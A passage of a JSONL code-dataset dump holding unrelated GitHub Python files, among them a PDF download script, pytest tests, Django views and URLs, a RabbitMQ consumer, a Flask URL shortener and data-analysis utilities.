urls = fd.readlines()\n urls = [x.strip() for x in urls if len(x.strip()) > 0]\n cmds = []\n for url in tqdm(urls):\n out_fn = OUT_DIR + url.split('/')[-1] + '.pdf'\n cmd = f'curl \"{url.strip()}\" -o {out_fn}'\n cmds.append(cmd)\n\n with open('/root/lca/abstract/acs/fetch_pdfs.sh', 'w') as fd:\n fd.write('\\n'.join(cmds))\n","repo_name":"griff4692/abstract_gen","sub_path":"abstract/data/acs/fetch_pdfs.py","file_name":"fetch_pdfs.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"36713688776","text":"\"\"\"\nTesting for the math.py module\n\"\"\"\n\nimport octo_tribble as ot\nimport pytest\n\ndef test_add():\n assert ot.math.add(5, 2) == 7\n assert ot.math.add(2, 5) == 7\n\ntestdata = [\n (2, 5, 10),\n (1, 2, 2),\n (11, 9, 99),\n (11, 0, 0),\n (0, 0, 0),\n]\n\n@pytest.mark.parametrize(\"a,b,expected\", testdata)\ndef test_mult(a, b, expected):\n assert ot.math.mult(a, b) == expected\n assert ot.math.mult(b, a) == expected\n\ntestdata2 = [\n (1, 2, 95),\n (0, 0, 42),\n (-5, 10, 30167),\n (2, 2, 110),\n (3, 7, 7290),\n]\n\n@pytest.mark.parametrize(\"a,b,expected\", testdata2)\ndef test_awesome(a, b, expected):\n assert ot.submodule.more_functs.awesome(a, b) == expected\n\n\n","repo_name":"mlestep/ideal-octo-tribble","sub_path":"tests/test_math.py","file_name":"test_math.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"19705878766","text":"from vao import VAO\nfrom texture import Texture\n\n\nclass Mesh:\n def __init__(self, app):\n self.app = app\n self.vao = VAO(app.ctx)\n self.texture = Texture(app)\n\n def destroy(self):\n self.vao.destroy()\n self.texture.destroy()","repo_name":"StanislavPetrovV/3D-Graphics-Engine","sub_path":"mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"51"} +{"seq_id":"3595062450","text":"from django.urls import path\r\n\r\nfrom .views import moderate, \\\r\n member_topics, commented_topics, recently_viewed, \\\r\n add_topic, add_post, edit_post, delete_post, \\\r\n topic_list, post_list, category_list, \\\r\n forum_search, new_topics\r\n\r\n\r\nurlpatterns = [\r\n path(\r\n 'moderation///',\r\n moderate,\r\n name='mod_topic'\r\n ),\r\n # member urls\r\n path('my-topics/', member_topics, name=\"member_topics\"),\r\n path('member-topics//', member_topics, name=\"topics_for_user\"),\r\n path('my-commented-topics', commented_topics, name=\"commented_topics\"),\r\n path('recently-viewed', recently_viewed, name=\"recently_viewed\"),\r\n\r\n # CRUD\r\n path('add-topic/', add_topic, name=\"generic_add_topic\"),\r\n path('/add-topic/', add_topic, name=\"add_topic\"),\r\n path(\r\n 'add_post///',\r\n add_post,\r\n name=\"add_post\"\r\n ),\r\n path(\r\n 'add_post////',\r\n add_post,\r\n name=\"post_with_quote\"\r\n ),\r\n path('edit_post//', edit_post, name=\"edit_post\"),\r\n path(\r\n 'delete_post///',\r\n delete_post,\r\n name='delete_post'\r\n ),\r\n\r\n path('search/', forum_search, name='fretboard_search'),\r\n path('new-topics/', new_topics, name=\"new_topics\"),\r\n path('new-topics/page/', new_topics, name=\"new_topics_paginated\"),\r\n path('latest-topics/', new_topics, name=\"new_24_hours\"),\r\n path('latest-topics/page/', new_topics, name=\"new_24_hours_paginated\"),\r\n # topic lists\r\n path('/', topic_list, name=\"topic_list\"),\r\n path('/page/', topic_list, name=\"topic_list_paginated\"),\r\n # post lists\r\n path(\r\n '///page/',\r\n post_list,\r\n name=\"post_list_paginated\"\r\n ),\r\n path(\r\n '///',\r\n post_list,\r\n name=\"post_short_url\"\r\n ),\r\n path('', category_list, name='fretboard_index'),\r\n]\r\n","repo_name":"tBaxter/django-fretboard","sub_path":"fretboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"51"} +{"seq_id":"15707392783","text":"import os\nall_files = os.listdir(os.curdir)\nfile_dict = dict()\n\nfor each_file in all_files:\n\tif os.path.isfile(each_file): #os.path.isfile() 判断路径是否为文件 \n\t\tfile_size = type_dict.path.getsize(each_file) #os.path.getsize() #返回文件大小(byte)\n\t\tfile_dict[each_file] = file_size\n\nfor each in file_dict.items():\t\t#dict.items() 以列表返回可遍历的(键, 值) 元组数组\n\tprint('%s的大小是 【%dBytes】 ' % (each[0], each[1]))\n","repo_name":"zhsword/exercise","sub_path":"Copy/Files size statistics.py","file_name":"Files size statistics.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"26556724992","text":"from operator import sub\n\ndef sign(x):\n return 1 if x > 0 else -1\n\ndef add_tuples(a,b):\n return tuple(sum(x) for x in zip(a,b))\n\nwith open(\"9.txt\") as f:\n moves = [(direction, int(distance)) for direction, distance in (line.rstrip(\"\\n\").split(\" \") for line in f)]\n\nmovements = {\n \"R\": (1,0),\n \"L\": (-1,0),\n \"U\": (0,1),\n \"D\": (0,-1)\n}\n\ndef get_visited(length):\n rope = [(0,0) for _ in range(length)]\n\n visited = set()\n\n for direction, distance in moves:\n movement = movements[direction]\n for i in range(distance):\n rope[0] = add_tuples(rope[0],movement)\n for i in range(1,length):\n prev_knot, cur_knot = rope[i-1:i+1]\n diff_x, diff_y = (sub(*x) for x in zip(prev_knot,cur_knot))\n tail_x, tail_y = cur_knot\n if abs(diff_x) > 1 or abs(diff_y) > 1:\n if diff_y == 0:\n tail_x += sign(diff_x)\n elif diff_x == 0:\n tail_y += sign(diff_y)\n else:\n tail_x += sign(diff_x)\n tail_y += sign(diff_y)\n rope[i] = (tail_x,tail_y)\n visited.add(rope[-1])\n \n return len(visited)\n\nprint(get_visited(2))\nprint(get_visited(10))","repo_name":"jackstrosahl/advent-of-code-2022","sub_path":"9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"72158492639","text":"from __future__ import annotations\nfrom typing import Optional\nfrom .base import BaseEnvManager, EnvExistsError, EnvironmentEntry, is_package_entry\nimport subprocess\nimport json\nimport os\nimport yaml\nfrom ..logger import ENVPICKER_LOGGER\n\n\nclass CondaManager(BaseEnvManager):\n CONDACMD = \"conda\"\n\n def __init__(self, *args, **kwargs) -> None:\n super().__init__(*args, **kwargs)\n self.condainfo = json.loads(\n subprocess.check_output([self.CONDACMD, \"info\", \"--json\"]).decode(\"utf-8\")\n )\n\n @classmethod\n def is_available(cls) -> bool:\n try:\n _ = subprocess.check_output([cls.CONDACMD, \"--version\"])\n return True\n except Exception:\n return False\n\n def register_all(self) -> None:\n \"\"\"Register all available environments.\"\"\"\n\n env_list_output = subprocess.check_output(\n [self.CONDACMD, \"env\", \"list\", \"--json\"]\n )\n env_list_json = json.loads(env_list_output.decode(\"utf-8\"))\n environments = env_list_json[\"envs\"]\n r = 0\n for env_path in environments:\n env = self.get_env_by_path(env_path)\n if env:\n continue\n\n env_name = os.path.basename(\n env_path\n ) # by default, use the name of the directory as the environment name\n\n # Register the environment using add_env function\n try:\n self.register_environment(\n path=env_path,\n py_executable=None,\n name=env_name,\n force=False,\n )\n ENVPICKER_LOGGER.info(\n \"Successfully registered %s (%s)\", env_name, env_path\n )\n r += 1\n except EnvExistsError:\n continue\n ENVPICKER_LOGGER.info(\"Successfully registered %s environments.\", r)\n\n def get_dependencies(self, env: EnvironmentEntry):\n yaml_string = subprocess.check_output(\n [\n self.CONDACMD,\n \"env\",\n \"export\",\n \"--no-builds\",\n \"-p\",\n env[\"path\"],\n ]\n )\n yaml_string = yaml_string.decode(\"utf-8\")\n data = yaml.safe_load(yaml_string)\n deps = []\n for entry in data[\"dependencies\"]:\n if is_package_entry(entry):\n deps.append(entry)\n elif isinstance(entry, dict):\n if \"pip\" in entry:\n for pip_entry in entry[\"pip\"]:\n if is_package_entry(pip_entry):\n deps.append(pip_entry)\n\n return deps\n\n\nclass MambaManager(CondaManager):\n CONDACMD = \"mamba\"\n","repo_name":"Linkdlab/EnvPicker","sub_path":"envpicker/manager/conda_mngr.py","file_name":"conda_mngr.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"5504903274","text":"import board # board module lets us use the hardware\nimport neopixel # add the neopixel module\n\n# Update this to match the number of NeoPixel LEDs connected to your board.\nnum_pixels = 5\n\n# Set up neopixel module with an object called 'pixels'\npixels = neopixel.NeoPixel(board.GP22, num_pixels)\n\n# Set brightness between 0. and 1.\npixels.brightness = 0.5\n\nwhile True:\n # .fill sets all pixels to an RGB value instantly\n pixels.fill((255, 0, 0))\n","repo_name":"AidanTek/PicoCircuitPythonTutorial","sub_path":"fillcolour.py","file_name":"fillcolour.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"35414728212","text":"# Problem Statement Link : https://www.spoj.com/problems/SAMER08F/\nwhile True:\n\tn = int(input())\n\tif n == 0:\n\t\tbreak\n\tans = 0\n\twhile n > 1:\n\t\tans += n * n\n\t\tn -= 1\n\tprint(ans + 1)\n","repo_name":"sonushahuji4/SPOJ","sub_path":"8_Feynman.py","file_name":"8_Feynman.py","file_ext":"py","file_size_in_byte":180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"72164321758","text":"import pika, sys, os\nimport mysql.connector,logging, json\n\n\ndb = mysql.connector.connect(host=\"AccountSQL\", user=\"root\", password=\"root\",database=\"stellar_account\")\ndbc = db.cursor(dictionary=True)\n\n\ndef main():\n def get_message(ch, method, properties, body):\n route = method.routing_key\n \n # Parse json data di dalam 'body' untuk mengambil data terkait event\n data = json.loads(body)\n event = data['event']\n id = data['id']\n username = data['username']\n account_id = data['account_id']\n\n # Tambah jumlah order sebanyak 1 untuk id kantin tertentu\n if route == '*.change':\n sql = \"UPDATE Account SET username=%s WHERE id=%s;\"\n dbc.execute(sql, [username, account_id] )\n elif route == '*.remove':\n sql = \"DELETE FROM Account WHERE username=%s;\"\n dbc.execute(sql, [username] )\n\n db.commit()\n\n # tampilkan pesan bahwa event sudah diproses\n message = 'id: ' + str(id) + ' - username: ' + str(username)\n logging.warning(\"%r : %r\" % str(event), message)\n \n # acknowledge message dari RabbitMQsecara manual yang \n # menandakan message telah selesai diproses\n ch.basic_ack(delivery_tag=method.delivery_tag)\n\n\n\n # buka koneksi ke server RabbitMQ di PetraMQ\n credentials = pika.PlainCredentials('radmin', 'rpass')\n connection = pika.BlockingConnection(pika.ConnectionParameters('EOMQ',5672,'/',credentials))\n channel = connection.channel()\n\n # Buat exchange dan queue\n queue_name = 'account_queue'\n channel.exchange_declare(exchange='EOEX', exchange_type='topic')\n channel.queue_declare(queue=queue_name, exclusive=True)\n channel.queue_bind(exchange='EOEX', queue=queue_name, routing_key='client.change')\n channel.queue_bind(exchange='EOEX', queue=queue_name, routing_key='staff.change')\n channel.queue_bind(exchange='EOEX', queue=queue_name, routing_key='client.remove')\n channel.queue_bind(exchange='EOEX', queue=queue_name, routing_key='staff.remove')\n\n # Ambil message dari RabbitMQ (bila ada)\n channel.basic_qos(prefetch_count=1)\n channel.basic_consume(queue=queue_name, on_message_callback=get_message)\n channel.start_consuming()\n\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n print('Interrupted')\n try:\n sys.exit(0)\n except SystemExit:\n os._exit(0)","repo_name":"adrianwinaya2/Stellar-Production","sub_path":"5_account_service/AccountCons/account_consumer.py","file_name":"account_consumer.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41572676127","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport datetime\r\nimport random\r\nimport warnings\r\nimport seaborn as sns\r\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\r\nfrom sklearn.decomposition import PCA\r\n\r\ndef get_data_and_labels(df):\r\n labels = df[\"Classes\"].to_frame()\r\n df = df.drop(columns=\"Classes\", axis=1)\r\n return df,labels\r\n\r\ndef create_features(df, window, ignore_cols):\r\n stats = ['max_','min_','mean_','median_']\r\n for attribute in df.columns:\r\n if attribute in ignore_cols:\r\n continue\r\n\r\n df[stats[0]+attribute] = df.rolling(window, on=\"Date\", axis=0, closed= \"left\").max().fillna(0)[attribute]\r\n df[stats[0]+attribute][1::2] = df.rolling(window+1, on=\"Date\", axis=0, closed= \"left\").max().fillna(0)[attribute][1::2]\r\n \r\n df[stats[1]+attribute] = df[attribute].rolling(window, closed= \"left\").min().fillna(0)\r\n df[stats[1]+attribute][1::2] = df.rolling(window+1, on=\"Date\", axis=0, closed= \"left\").min().fillna(0)[attribute][1::2]\r\n\r\n df[stats[2]+attribute] = df[attribute].rolling(window, closed= \"left\").mean().fillna(0)\r\n df[stats[2]+attribute][1::2] = df.rolling(window+1, on=\"Date\", axis=0, closed= \"left\").mean().fillna(0)[attribute][1::2]\r\n\r\n df[stats[3]+attribute] = df[attribute].rolling(window, closed= \"left\").median().fillna(0)\r\n df[stats[3]+attribute][1::2] = df.rolling(window+1, on=\"Date\", axis=0, closed= \"left\").median().fillna(0)[attribute][1::2]\r\n\r\n\r\ndef perform_data_standardization(data, method=\"StandardScaler\"):\r\n # except date, take all columnsdata\r\n # cols = data.columns.difference(['Date'])\r\n cols = data.columns\r\n if method == \"StandardScaler\":\r\n scaler = StandardScaler(copy = True)\r\n # scaler.fit(data[cols])\r\n data[cols] = scaler.fit_transform(data[cols])\r\n elif method == \"MinMaxScaler\":\r\n scaler = MinMaxScaler(copy = True)\r\n # scaler.fit(data[cols])\r\n data[cols] = scaler.fit_transform(data[cols])\r\n return data, scaler\r\n\r\n## split of train and val data \r\ndef split_data(df,labels, gap = 4, train_perc=0.8):\r\n train_size = int(0.8 * len(df))\r\n val_size = len(df) - train_size\r\n train_data, train_label = df[:train_size], labels[:train_size]\r\n val_data, val_label = df[train_size+gap:], labels[train_size+gap:]\r\n train_df = pd.DataFrame(train_data)\r\n val_df = pd.DataFrame(val_data)\r\n return train_df,train_label,val_df,val_label\r\n\r\ndef PCA_Reduction(data, n_components=5, mode=\"train\"):\r\n if mode == \"train\":\r\n pca = PCA(n_components=n_components)\r\n pca.fit(data)\r\n x_pc = pca.transform(data)\r\n elif mode == \"test\":\r\n x_pc = pca.transform(data)\r\n\r\n return x_pc\r\n \r\ndef get_correlated_features(data,threshold):\r\n col_corr = set()\r\n corr_matrix = data.corr()\r\n plt.rcParams['figure.figsize'] = (15,15)\r\n sns.heatmap(corr_matrix,annot=True,cmap='viridis',linewidths=.05)\r\n for i in range(len(corr_matrix.columns)):\r\n for j in range(i):\r\n if abs(corr_matrix.iloc[i,j]) > threshold:\r\n colname = corr_matrix.columns[i]\r\n col_corr.add(colname)\r\n return col_corr\r\n\r\n","repo_name":"Divya-Nandlal-Sahetya/Predicting-Forest-Fire-in-Algeria-Using-Machine-Learning-Techniques","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"28360334945","text":"\nimport numpy as np\nimport nltk\n# nltk.download('punkt')\nfrom nltk.stem.porter import PorterStemmer\nstemmer = PorterStemmer()\n\n\ndef tokenize(sentence):\n return nltk.word_tokenize(sentence)\n\ndef stem(word):\n return stemmer.stem(word.lower())\n\ndef bag_of_words(tokenized_sentence, all_words):\n \n tokenized_sentence = [stem(w) for w in tokenized_sentence]\n\n bag = np.zeros(len(all_words) , dtype = np.float32)\n for index, w in enumerate(all_words):\n if w in tokenized_sentence:\n bag[index] = 1.0\n \n return bag\n\n# Training Data Example\n\nsentence = ['hello', 'how', 'are', 'you']\nwords = ['hi', 'hello', 'bye', 'goodbye', 'thank', 'cool', 'how']\nbag = bag_of_words(sentence, words)\n# print(bag)\n\n\n#Testing the Stemming \nwords = ['Organize', 'Organizing', 'organizes', 'panic','panicing']\nstemmed_words = [stem(w) for w in words]\n\n\n\n\n","repo_name":"richab246/Chatbot","sub_path":"backend/nltk_utils.py","file_name":"nltk_utils.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"22037721279","text":"from django.forms import Textarea, TextInput\nfrom django.shortcuts import render, redirect, HttpResponse\nfrom django.views import generic\n\nimport os\n\n# from django.contrib.messages.views import SuccessMessageMixin TODO: use mixin?\n\nfrom .oauth_view import GET_GOOGLE_OAUTH2_MSG, GET_GOOGLE_OAUTH2_INSECURE_VALUE\n\nfrom .models import BotSettings, BotLogModel\nfrom .forms import (\n BotSettingsForm,\n FormStatus,\n create_bot_settings_form_factory,\n get_form_status_str,\n)\n\nfrom apps.web.src_bot.common.google.api import (\n get_google_auth_url,\n is_google_token_valid,\n refresh_google_token,\n)\n\nfrom .validators.bot_settings import (\n ValidationWarn,\n ValidationError,\n _ as gettext_lazy,\n)\n\nfrom .src_bot.mailing import *\nfrom .src_bot.common.google.api import *\n\n\nBOT_SETTINGS_FORM_CLASS = BotSettingsForm\nBOT_LOG_MODEL_CLASS = BotLogModel\n\nK_ID_DATA_COLUMN_GOOGLE_SHEET = (\n BOT_SETTINGS_FORM_CLASS.Meta.K_ID_DATA_COLUMN_GOOGLE_SHEET\n)\nK_ID_GOOGLE_SHEET = BOT_SETTINGS_FORM_CLASS.Meta.K_ID_GOOGLE_SHEET\nK_TO_SEND_MESSAGE = BOT_SETTINGS_FORM_CLASS.Meta.K_TO_SEND_MESSAGE\n\n\ndef _make_bot_settings_widgets(values_in_placeholders_map=None):\n values_are_not_none = (\n False if (values_in_placeholders_map is None) else True\n )\n values_map = {\n K_TO_SEND_MESSAGE: values_in_placeholders_map[K_TO_SEND_MESSAGE]\n if values_are_not_none\n else \"\",\n K_ID_GOOGLE_SHEET: values_in_placeholders_map[K_ID_GOOGLE_SHEET]\n if values_are_not_none\n else \"\",\n K_ID_DATA_COLUMN_GOOGLE_SHEET: values_in_placeholders_map[\n K_ID_DATA_COLUMN_GOOGLE_SHEET\n ]\n if values_are_not_none\n else \"\",\n }\n\n widgets = {\n K_TO_SEND_MESSAGE: Textarea(\n attrs={\n \"class\": \"input input--stretch input--xl send--message--input\",\n \"placeholder\": f\"Введите сообщение для отправки. Текущее сообщение: {values_map[K_TO_SEND_MESSAGE]}\",\n },\n ),\n K_ID_GOOGLE_SHEET: TextInput(\n attrs={\n \"class\": \"input input--stretch input--s\",\n \"placeholder\": f\"ID Google-таблицы: {values_map[K_ID_GOOGLE_SHEET]}\",\n },\n ),\n K_ID_DATA_COLUMN_GOOGLE_SHEET: TextInput(\n attrs={\n \"class\": \"input input--stretch input--s\",\n \"placeholder\": f\"Столбик с номерами (A-Z), текущий столбик: {values_map[K_ID_DATA_COLUMN_GOOGLE_SHEET]}\",\n },\n ),\n }\n\n return widgets\n\n\n# Context Keys\n\nCK_BOT_SETTINGS_FORM = \"settings_form\"\nCK_LOG_BOT_LIST = \"log_list\"\nCK_WAS_ERROR = \"was_error\"\nCK_ON_FORM_POST_POPUP_TYPE = \"popup_type\" # FormStatus as str\nCK_ON_SEND_MESSAGES_POPUP = \"messages_are_sending_popup\"\nCK_ERRORS = \"errors\"\nCK_HAS_GOOGLE_TOKEN = \"has_google_token\"\n\n# Context Keys\n\n\ndef _update_context_err(context, msg, code):\n context[CK_ERRORS] = {\n \"msg\": [\n ValidationError(\n gettext_lazy(msg),\n code=code,\n )\n ]\n }\n\n\nclass WebMainView(generic.CreateView):\n template_name = \"web/base.html\"\n form_class = BOT_SETTINGS_FORM_CLASS\n\n def __init__(self, **kwargs) -> None:\n super().__init__(**kwargs)\n\n self.object = None\n self.get_context_data\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n context[CK_LOG_BOT_LIST] = BOT_LOG_MODEL_CLASS.objects.all()\n context[CK_BOT_SETTINGS_FORM] = self._create_bot_settings_form_factory(\n self._get_completed_bot_settings()\n )()\n\n context[CK_WAS_ERROR] = False\n\n refresh_google_token()\n context[CK_HAS_GOOGLE_TOKEN] = is_google_token_valid()\n\n if BOT_LOG_MODEL_CLASS.objects.all().count() > 5000:\n BOT_LOG_MODEL_CLASS.objects.all().delete()\n\n return context\n\n def get(self, request, *_, **kwargs):\n context = self.get_context_data(**kwargs)\n # BOT_SETTINGS_FORM_CLASS.Meta.model.objects.all().delete()\n\n return render(\n request,\n self.template_name,\n context,\n )\n\n def post(self, request, *_, **kwargs):\n context = self.get_context_data(**kwargs)\n\n settings_empty_on_first_set = self._are_settings_empty(request.POST)\n\n context[CK_WAS_ERROR] = (settings_empty_on_first_set,)\n context[CK_ON_FORM_POST_POPUP_TYPE] = get_form_status_str(FormStatus.OK)\n\n if request.POST.get(\"action\") == \"send\":\n if not context[CK_HAS_GOOGLE_TOKEN]:\n auth_url = get_google_auth_url()\n return redirect(auth_url)\n\n updated_context = self._handle_on_send_messages_btn_press(\n request, context\n )\n return render(request, self.template_name, updated_context)\n\n bot_settings_form: BOT_SETTINGS_FORM_CLASS = self.form_class(\n request.POST\n )\n\n if not settings_empty_on_first_set:\n bot_settings_form.save()\n\n form_is_valid = bot_settings_form.is_valid()\n if not form_is_valid or settings_empty_on_first_set:\n errors_data = bot_settings_form.errors.as_data()\n if not settings_empty_on_first_set:\n context[CK_ERRORS] = errors_data\n else:\n _update_context_err(\n context,\n \"Необходимо ввести все данные при первой настройке\",\n code=\"err_empty_settings_on_first_set\",\n )\n\n context[CK_ON_FORM_POST_POPUP_TYPE] = (\n get_form_status_str(FormStatus.ERR)\n if settings_empty_on_first_set\n or not all(\n isinstance(err[0], ValidationWarn)\n for err in errors_data.values()\n )\n else get_form_status_str(FormStatus.WARN)\n )\n if context[CK_ON_FORM_POST_POPUP_TYPE] == get_form_status_str(\n FormStatus.ERR\n ):\n for k, err in list(context[CK_ERRORS].items()):\n if isinstance(err[0], ValidationWarn):\n del context[CK_ERRORS][k]\n\n context[CK_WAS_ERROR] = True\n\n bot_settings_form_factory = (\n self._create_bot_settings_form_factory(\n self._get_completed_bot_settings()\n )\n if CK_ERRORS in context\n else self._create_bot_settings_form_factory(\n self._get_completed_bot_settings(request)\n )\n ) # we're rendering current bot settings in placeholders in widgets of inputs if data is ok\n\n context[CK_BOT_SETTINGS_FORM] = bot_settings_form_factory()\n\n return render(request, self.template_name, context)\n\n def _get_completed_bot_settings(self, request=None):\n # TODO: remove all non-relative for this view instances methods, that are not using `self`\n bot_settings = {\n K_ID_DATA_COLUMN_GOOGLE_SHEET: \"\",\n K_ID_GOOGLE_SHEET: \"\",\n K_TO_SEND_MESSAGE: \"\",\n }\n if request:\n for k, _ in bot_settings.items():\n bot_settings[k] = request.POST[k]\n\n manager = BotSettings.objects\n if manager.count() != 0:\n if len(bot_settings[K_TO_SEND_MESSAGE]) == 0:\n bot_settings[K_TO_SEND_MESSAGE] = manager.filter()[\n 0\n ].to_send_message\n bot_settings[K_ID_GOOGLE_SHEET] = manager.filter()[\n 0\n ].id_google_sheet\n if len(bot_settings[K_ID_DATA_COLUMN_GOOGLE_SHEET]) == 0:\n bot_settings[K_ID_DATA_COLUMN_GOOGLE_SHEET] = manager.filter()[\n 0\n ].id_data_column_google_sheet\n return bot_settings\n\n def _are_settings_empty(self, post_query) -> bool:\n no_settings_in_bd = self._get_all_bot_settings_records().count() == 0\n\n if not no_settings_in_bd:\n return False\n\n any_setting_is_empty_from_post = any(\n len(value) == 0 for value in post_query.values()\n )\n\n return no_settings_in_bd and any_setting_is_empty_from_post\n\n def _create_bot_settings_form_factory(\n self, bot_settings_to_show_in_widgets=None\n ):\n return create_bot_settings_form_factory(\n _make_bot_settings_widgets(bot_settings_to_show_in_widgets)\n )\n\n def _get_all_bot_settings_records(self):\n return BotSettings.objects.all()\n\n def _handle_on_send_messages_btn_press(self, request, context):\n try:\n bot_complete_settings = self._get_completed_bot_settings(request)\n generalMailing(bot_complete_settings)\n context[CK_ON_SEND_MESSAGES_POPUP] = get_form_status_str(\n FormStatus.OK\n )\n except Exception:\n _update_context_err(\n context,\n f\"Не удалось отправить сообщения. Подробнее в логе бота\",\n code=\"err_empty_settings_on_first_set\",\n )\n context[CK_ON_FORM_POST_POPUP_TYPE] = get_form_status_str(\n FormStatus.ERR\n )\n context[CK_WAS_ERROR] = True\n\n return context\n\n\ndef reset_settings(_):\n if os.path.exists(GoogleSheetsAuthData.TOKEN_PATH):\n os.remove(GoogleSheetsAuthData.TOKEN_PATH)\n\n return HttpResponse()\n\n\n__all__ = [\"WebMainView\", \"reset_settings\"]\n","repo_name":"illusior/whatsapp-bot","sub_path":"src/apps/web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40058706553","text":"from flask import Flask, render_template, request\nfrom flask_sqlalchemy import SQLAlchemy\nimport random\nimport string\n\n# create flask app\napp = Flask(__name__)\n\n# set up database\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///shorturl.db'\ndb = SQLAlchemy(app)\n\n# create database class model\nclass UrlStore(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n longUrl = db.Column(db.String(), unique=True, nullable=False)\n shortUrl = db.Column(db.String(), unique=True, nullable=False)\n\n def __repr__(self) -> str:\n return f'Real url => {self.shortUrl} \\n Short url => {self.shortUrl}'\n\nwith app.app_context():\n db.create_all()\n\n# generate a short url\ndef generate_short_url():\n letters_digits = string.ascii_letters + string.digits\n short_url = ''.join(random.choice(letters_digits) for _ in range(7))\n url = UrlStore.query.filter_by(shortUrl=short_url).first()\n if url:\n # If the generated short URL already exists in the database,\n # generate a new one recursively\n return generate_short_url()\n return short_url\n\n# create root for home page\n@app.route('/')\ndef index():\n return render_template(\"index.html\")\n\n# shorten endpoint\n@app.route('/shorten', methods=['POST'])\ndef shorten():\n if request.method == 'POST':\n long_url = request.form['url']\n # check if user inputs long url and url does not exist in database\n if long_url and UrlStore.query.filter_by(longUrl=long_url).first() is None: \n short_url = generate_short_url()\n url = UrlStore(longUrl=long_url, shortUrl=short_url)\n db.session.add(url)\n db.session.commit()\n return render_template('result.html', short_url = short_url )\n else:\n return render_template(\"index.html\")\n return render_template(\"index.html\")\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n","repo_name":"Inioluwajeremiah/UrlShortener","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"3108527610","text":"from __future__ import print_function\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_auc_score, average_precision_score, precision_recall_curve, roc_curve\nfrom matplotlib import pyplot as plt\nfrom MulticoreTSNE import MulticoreTSNE as TSNE\nimport numpy as np\nimport os\nimport plotly.offline as py\nimport plotly.graph_objs as go\nfrom datetime import datetime\nfrom retentioneering.analysis.utils import check_folder, get_all_agg, plot_graph_python\nimport pandas as pd\n\n\ndef str_agg(x):\n return ' '.join(x)\n\n\ndef create_filter(data, n_folds=None):\n all_events = set(data.event_name)\n x = data.groupby('event_name').user_pseudo_id.count()\n if n_folds is None:\n n_folds = (x.shape[0] // 200) + 1\n hist = np.histogram(x, bins=n_folds)\n while (hist[0] == 0).sum() > 0:\n x = x[x < hist[1][n_folds - 2]]\n x = x[x > hist[1][0]]\n hist = np.histogram(x, bins=n_folds)\n return all_events - set(x.index)\n\n\nclass Model:\n def __init__(self, data, target_event, settings, event_filter=None,\n n_start_events=None, emb_type='tf-idf', ngram_range=(1, 3),\n emb_dims=None, embedder=None):\n\n self._source_data = data\n self.data = self._prepare_dataset(data, target_event, event_filter, n_start_events)\n self.features = self.data.event_name.values\n self.target = self.data.target.values\n self.users = self.data.user_pseudo_id.values\n self.emb_type = emb_type\n self._embedder = embedder\n self.ngram_range = ngram_range\n self.emb_dims = emb_dims\n self.roc_auc_score = None\n self.average_precision_score = None\n self.roc_c = None\n self.prec_rec = None\n self._check_folder(settings)\n\n if embedder:\n self._fit_vec = False\n else:\n self._fit_vec = True\n\n def _get_vectors(self, sample):\n if self._fit_vec:\n self._fit_vectors(sample)\n return self._embedder.transform(sample)\n\n def _fit_vectors(self, sample):\n if self.emb_type == 'tf-idf':\n from sklearn.feature_extraction.text import TfidfVectorizer\n tfidf = TfidfVectorizer(ngram_range=self.ngram_range)\n self._embedder = tfidf.fit(sample)\n self._fit_vec = False\n\n def _prepare_dataset(self, df, target_event, event_filter=None, n_start_events=None):\n if event_filter is not None:\n df = df[df.event_name.isin(event_filter)]\n df = df.sort_values('event_timestamp')\n train = df.groupby('user_pseudo_id').event_name.agg(str_agg)\n train = train.reset_index(None)\n train.event_name = train.event_name.apply(lambda x: x.split())\n train['target'] = train.event_name.apply(lambda x: x[-1] == target_event)\n train.event_name = train.event_name.apply(lambda x: x[:-1])\n if n_start_events:\n train.event_name = train.event_name.apply(lambda x: ' '.join(x[:n_start_events]))\n else:\n train.event_name = train.event_name.apply(lambda x: ' '.join(x))\n return train\n\n def _prepare_data(self):\n x_train, x_test, y_train, y_test = train_test_split(self.features, self.target, 